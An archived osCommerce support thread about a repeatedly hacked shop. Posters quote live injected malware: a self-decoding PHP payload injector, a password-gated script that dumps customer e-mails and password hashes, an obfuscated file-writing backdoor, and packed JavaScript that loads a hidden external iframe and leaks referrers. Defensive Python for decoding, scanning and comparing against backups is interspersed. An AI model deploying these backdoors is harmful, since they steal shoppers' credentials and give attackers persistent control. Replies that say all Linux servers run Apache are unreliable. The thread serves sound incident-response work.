
osCommerce

The e-commerce.

Hacked and hacked and hacked :(


deirossiteam


My application top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR security pro, HT access protection, deleted the admin file manager... yet as soon as I clean up the code, it reappears eventually. I have changed the passwords; I should be the only one with access to the site.

 

Here is what the malicious code looks like.

/**start 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 end**/
$__name = md5($_SERVER['HTTP_HOST']);

$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";

// Only Windows browsers are targeted, and each visitor only once: a cookie
// named after the host is set so the payload is not delivered a second time
if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {
    $date = date("D, j M Y 00:00:00", time()+60*60*24*30);
    $cookie = time().".".rand(1111111, 9999999);
    $set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);
    if(!$set_js)
        echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';

    // The payload lives in the /**start ... end**/ comment above: the script
    // reads its own source, pulls out the base64 text and echoes it decoded
    $__content = file_get_contents(__FILE__);
    preg_match("#\*start(.*?)end\*#is", $__content, $__m);
    if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {
        echo base64_decode($__m[1]);
    }
    elseif(isset($__m[1]) and trim($__m[1])!="") {
        echo $__m[1];
    }
}

 

It is normally inserted right after the opening <?php.

Any ideas? Anything I should check for?

Thanks for your help in advance.


Kavon,

OK, now that you're in the correct forum: have you made the security changes to your admin files as suggested here?

http://www.oscommerce.com/forums/index.php?showtopic=340995

And also made the security changes as outlined in this thread?

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor.

Check your hosting account for unknown files: files with double extensions (file.html.php) or other anomalies.

Chris


I did find a file mhp.php in my catalog/images directory with the following code:

<?php
$p=$_REQUEST['p'];
// Password gate: only a caller who knows the value hashing to this md5 gets past it
if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');
// Self-delete on demand (?d=1)
if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);
echo "#mhpver11"."\n";
//mail hash parser oscommerce
// Reuses the shop's own database credentials from the sibling includes/ directory
include "../includes/database_tables.php";
include "../includes/configure.php";
$link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD)
    or die("Could not connect");
mysql_select_db(DB_DATABASE);
// Dumps every customer's e-mail address and stored password (hash:salt format)
$result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
    $l = $line['customers_email_address'].":".$line['customers_password'];
    if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."\n";
}
?>

Would this be something aiding the hacker?


People always look to osCommerce when they get hacked, but often it is not anything to do with osCommerce at all.

If the host server is vulnerable they (the hackers) can hack a single site on the server and, once achieved, can arbitrarily hack the rest of the sites on the server where permissions allow.

Most of the "hack" posts I see on this forum tend to be host related, just my opinion.


(quoting deirossiteam's first post above)

Here is the decode for that top line; maybe someone can tell us what it is.

<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script>

Thanks, Bo
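A decoder for that packer format, added here as an example and not code from the thread: it pulls the (p, a, c, k) arguments out of each eval(...) wrapper in the script posted above and replays the wrapper's own replacement loop in Python, so the document.write() calls it hides can be read without running any of it. The only change to the sample is restoring the '©' glyphs (a forum mangling of "(c)") to "(c)".

```python
import re

# Tail of a "p,a,c,k,e,d" packer call, as in the <script> posted above:
#   eval(function(p,a,c,k,e,d){...}('<p>',<a>,<c>,'<k>'.split('|'),0,{}))
_PACKED_CALL = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\),0,\{\}\)\)"
)
_DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def _to_base(n, base):
    """JavaScript Number.prototype.toString(base) for 2 <= base <= 36."""
    return _DIGITS[n] if n < base else _to_base(n // base, base) + _DIGITS[n % base]


def _js_unescape(s):
    """Undo the backslash escapes inside a single-quoted JS string literal."""
    return re.sub(r"\\(.)", r"\1", s)


def unpack(p, a, c, k):
    """Replay the wrapper's loop: every \\w+ token in p is a base-a index into
    the word list k, and an empty k entry means the token stands for itself
    (that is what `k[c]||c.toString(a)` does in the JavaScript)."""
    d = {}
    for i in range(c):
        key = _to_base(i, a)
        d[key] = k[i] if i < len(k) and k[i] else key
    return re.sub(r"\b\w+\b", lambda m: d.get(m.group(0), m.group(0)), p)


def unpack_all(script):
    """Decode every packed eval() call found in a script body, in order."""
    return [unpack(_js_unescape(p), int(a), int(c), k.split("|"))
            for p, a, c, k in _PACKED_CALL.findall(script)]


# The packed script posted above, with the '©' glyphs restored to '(c)'.
SAMPLE = r"""<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script>"""

if __name__ == "__main__":
    for statement in unpack_all(SAMPLE):
        print(statement)
```

The first call yields a hidden 1x1 iframe pointing at an external site and the second an invisible tracking image that reports the visitor's referrer.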


2 weeks later...

Still having problems :(

I've found this code in my product listing module:

<?php
// Both strings are built from chr() calls so that neither "get_access" nor
// "Restricte access" shows up in a plain-text search of the file
if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

// File writer: base64-decoded POST data is written to whatever path the
// request names, which is how further files get planted
if(isset($_POST['update']) AND !empty($_POST['path'])) {
    $filename = $_POST['path'];
    $somecontent = base64_decode($_POST['update']);
    if (!$handle = fopen($filename, 'w')) {
        echo "Cannot open file ($filename)";
        exit;
    }
    if (fwrite($handle, $somecontent) === FALSE) {
        echo "Cannot write to file ($filename)";
        exit;
    }
    echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";
    fclose($handle);
    exit();
}
?><?php
// The same block was injected a second time, directly after the first
if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

if(isset($_POST['update']) AND !empty($_POST['path'])) {
    $filename = $_POST['path'];
    $somecontent = base64_decode($_POST['update']);
    if (!$handle = fopen($filename, 'w')) {
        echo "Cannot open file ($filename)";
        exit;
    }
    if (fwrite($handle, $somecontent) === FALSE) {
        echo "Cannot write to file ($filename)";
        exit;
    }
    echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";
    fclose($handle);
    exit();
}
?>

Thanks!

(quoting Bo's decode above)
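The three snippets found so far (the marker block in the application top file, mhp.php, and the writer in the product listing module) share a handful of tell-tale constructs. An added example, not code from the thread: a small Python scanner that checks PHP source for those constructs, decodes chr() chains, and traces request parameters into fopen(); the rule names, the condensed samples and the placeholder payload are mine.

```python
import re

# Heuristic indicators drawn from the three snippets quoted in this thread;
# they are prompts for manual review, not a signature of one malware family.
_RULES = [
    ("start/end marker block carrying an embedded payload",
     re.compile(r"/\*\*start\b.*?\bend\*\*/", re.S)),
    ("script reads its own source with file_get_contents(__FILE__)",
     re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)")),
    ("echoes a base64-decoded blob",
     re.compile(r"echo\s+base64_decode\s*\(")),
    ("base64-decodes request data",
     re.compile(r"base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST)\[")),
    ("opens a file for writing",
     re.compile(r"fopen\s*\([^,]+,\s*['\"]w['\"]")),
    ("hard-coded md5 password gate",
     re.compile(r"md5\s*\(\s*\$\w+\s*\)\s*!=\s*['\"][0-9a-f]{32}['\"]")),
    ("deletes its own file on request",
     re.compile(r"unlink\s*\(\s*\$(?:HTTP_SERVER_VARS|_SERVER)\[['\"]SCRIPT_FILENAME['\"]\]")),
    ("selects customer e-mail and password columns",
     re.compile(r"customers_email_address\s*,\s*customers_password")),
]
_CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))+")
_REQUEST_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\$_(?:POST|GET|REQUEST)\[")


def decode_chr_chain(expr):
    """Turn chr(103).chr(101)... back into the string it builds at run time."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", expr))


def request_controlled_fopen(source):
    """True if a request parameter, directly or via a variable it was
    assigned to, ends up as the path argument of fopen()."""
    if re.search(r"fopen\s*\(\s*\$_(?:POST|GET|REQUEST)\[", source):
        return True
    return any(re.search(r"fopen\s*\(\s*\$%s\b" % re.escape(v), source)
               for v in set(_REQUEST_ASSIGN.findall(source)))


def scan_php(source):
    """Return the list of indicator descriptions found in one PHP source."""
    findings = [name for name, rx in _RULES if rx.search(source)]
    for chain in _CHR_CHAIN.findall(source):
        findings.append("chr() chain decodes to %r" % decode_chr_chain(chain))
    if request_controlled_fopen(source):
        findings.append("fopen() path is taken from the request")
    return findings


# Constructed samples condensed from the code quoted in this thread; the
# base64 payload is the harmless placeholder 'example'.
SAMPLE_TOP = """<?php
/**start ZXhhbXBsZQ== end**/
$__content = file_get_contents(__FILE__);
preg_match("#\\*start(.*?)end\\*#is", $__content, $__m);
if (isset($__m[1])) { echo base64_decode($__m[1]); }
"""
SAMPLE_MHP = """<?php
$p = $_REQUEST['p'];
if (!isset($p) || md5($p) != 'c180aaadf5ab10fb3a733f43f3ffc4b3') die('');
if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);
$result = mysql_query("SELECT customers_email_address,customers_password FROM " . TABLE_CUSTOMERS);
"""
SAMPLE_UPLOADER = """<?php
if (isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die('');
if (isset($_POST['update']) AND !empty($_POST['path'])) {
  $filename = $_POST['path'];
  $somecontent = base64_decode($_POST['update']);
  $handle = fopen($filename, 'w');
  fwrite($handle, $somecontent);
}
"""
SAMPLE_CLEAN = """<?php
require('includes/application_top.php');
$listing_sql = "select p.products_id from " . TABLE_PRODUCTS . " p";
"""
```

Point scan_php() at each .php file under the web root and review anything that returns a non-empty list; the clean osCommerce sample returns nothing.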


Most of the "hack" posts I see on this forum tend to be host related, just my opinion.

Correct, 100% agree on it. The majority of web hosts normally have 1000 websites on the same server and they don't care about website or server security!

Please read this line: Do you want to find all the answers to your questions? click here. As for the contribution database, it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing a contribution or editing/updating/deleting any files, do a full backup; it will save you and everyone here on the forum time to fix your issues.

Any issues with osCommerce, I am here to help you.


(quoting deirossiteam's post above)

If you have a clean backup on your PC, unzip it and compare the files on your PC to the ones on your server. I removed this one from a client's server last week. There were 16 infected files. Bo


(quoting Bo's decode above)

It deobfuscates to this:

document.write("<img src='http://groove01.co.cc/images/?h=65&abc="+document.referrer+"' width='0' height='0' border='0'>");

We Watch Your Website - so you don't have to!



Still having problems :(

My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all.

Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to, because you can have hidden files not displayed by FTP programs...

Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it.

Then restore your backup files. They are clean, right?

Then do all those security necessities. ALL OF THEM.

Only then remove the password on the root directory and make your shop visible to the world.

You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day, and any further successful hacks would almost surely be attributable to the host.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


(quoting the post above)

Yes, it is the answer some of the time, but if the bug is on the server side you have just wasted your time.


Yes it is the answer some of the time, but if the bug is on the server site you have just wasted your time.

No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct?



No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct?

All is well with me; mine is secure and has had no break-ins, but others are not so lucky. If I am working on someone's, I usually prefer to find the problem and figure out how they got in. Besides, half the people with a bug don't have an up-to-date backup in play to work with. I have plenty of backups and redirects if needed. Just saying some people don't have the option.

Bo


I have the same problem as described in comment #6. Have you found the cause of this security problem?

 

(quoting deirossiteam's post above)


The server may have been hacked. This generally means that there are shell scripts on the server which will just redo the back door when you have removed the affected code. This also means that the server is compromised and, depending on the severity, can mean that the entire kernel is as well.

I have gone through this before, and it is a huge headache. Generally you can delete to your heart's content, restore backups and everything else mentioned here, but due to the compromise, the hack will just reappear.

I have seen files with the exact same code modified (removed the offending code) and then 1/2 hr later the code reappears and the file date is set to two years previously. Thus no file tracking on date changes was seen. This occurred over and over, even after removal of all of the code from the site.

Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and, until it is rebuilt from a new install, will never be removed.

cheers

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
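Bo's advice to compare the live files against a clean backup, and the observation above that a re-injected file came back with a back-dated timestamp, point to the same check: diff the two trees by content hash rather than by date. An added example, not code from the thread, that does exactly that with SHA-256 over a pair of constructed directory trees; the file names and contents are mine.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map every file under root (as a relative path) to its SHA-256 digest.
    Only content is hashed: whoever re-injects code can reset the mtime, as
    reported above, so timestamps are deliberately not consulted."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def compare_trees(clean_root, live_root):
    """Return (added, modified, missing) paths of the live tree relative to
    the known-good backup, each list sorted for stable reporting."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    added = sorted(p for p in live if p not in clean)
    missing = sorted(p for p in clean if p not in live)
    modified = sorted(p for p in clean if p in live and clean[p] != live[p])
    return added, modified, missing


def _write(root, rel, data, mtime=None):
    """Write a text file below root, optionally forcing its mtime."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)
    if mtime is not None:
        os.utime(path, (mtime, mtime))


def demo():
    """Constructed scenario: a clean backup and a live copy in which the
    application top file was re-injected with its mtime set back to the
    original value, and a dropper was added under images/."""
    stamp = 1_200_000_000
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for root in (clean, live):
            _write(root, "includes/application_top.php",
                   "<?php\nrequire('includes/configure.php');\n", mtime=stamp)
            _write(root, "includes/configure.php",
                   "<?php define('DB_SERVER', 'localhost');\n")
        _write(live, "includes/application_top.php",
               "<?php\n/**start ZXhhbXBsZQ== end**/\nrequire('includes/configure.php');\n",
               mtime=stamp)
        _write(live, "images/mhp.php", "<?php /* constructed placeholder */\n")
        added, modified, missing = compare_trees(clean, live)
        same_mtime = (os.stat(os.path.join(clean, "includes/application_top.php")).st_mtime
                      == os.stat(os.path.join(live, "includes/application_top.php")).st_mtime)
        return {"added": added, "modified": modified, "missing": missing,
                "mtime_unchanged": same_mtime}


if __name__ == "__main__":
    print(demo())
```

The modified file is caught even though its mtime is identical in both trees, which is the case a date-based check misses.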


A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel. This vulnerability was found to affect a significant number of servers. CentOS has released a new kernel that includes a patch for this exploit.

There is currently not a way to patch a server that has already been exploited. If this patch is not applied and the server is exploited, the server will need to be re-imaged and content restored from backups.

This is a report on the issue and the severity.....

For details about the exploit:

https://access.redhat.com/kb/docs/DOC-40265

For details about the patch:

https://rhn.redhat.com/errata/RHSA-2010-0704.html

cheers and hope this helps

Peter McGrath



Would you be more specific about this?

Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed.

cheers


Would you be more specific about this?

Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above....

cheers

Peter McGrath



The links are for the Red Hat Enterprise Linux operating system.

You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk?

Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above....

cheers


The links are for Red Hat Enterprise Linux operating system

Correct. I use Red Hat on my servers, and this is related to me, but then many servers out there use the exact same set up.

You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk?

A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel

This does not just put osCommerce at risk; rather, it puts the entire domain / server at risk. Due to the fact that osCommerce is an e-commerce platform, they are targeted more so than a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over...

Peter McGrath



I am failing somehow to get through to you.

I'll be as plain as I can. I know the Red Hat operating system is vulnerable; that's not the point.

I would like to know which APACHE WEB SERVER version you are talking about in your original post that needs updating?

"Recently an exploit has been found that servers (Apache) must be updated to block"

Thank you.

 

(quoting Peter McGrath's reply above)


I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point.

This is the point.

I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating?

Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there; if based on Linux then all use the APACHE WEB SERVER.

APACHE and Linux are not the same thing. Apache is like a plug-in to the server: it allows the kernel to operate as a server. Linux would still work fine without Apache; it just would not act as a server, is all.

So, if your server is using Red Hat AND is based on 64 bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, Suse or other Linux releases which may be based on the CentOS 5 Apache release (or others that may have the same vulnerability).

cheers

Peter McGrath



Yes, of course. You are simply stating the obvious (however, some of it is incorrect, but I am not going there) but failing to answer the one question I keep asking time and time again. I think it's prudent that I just give up at this point. Have a good day!

 

(quoting Peter McGrath's reply above)


Archived

This topic is now archived and is closed to further replies.
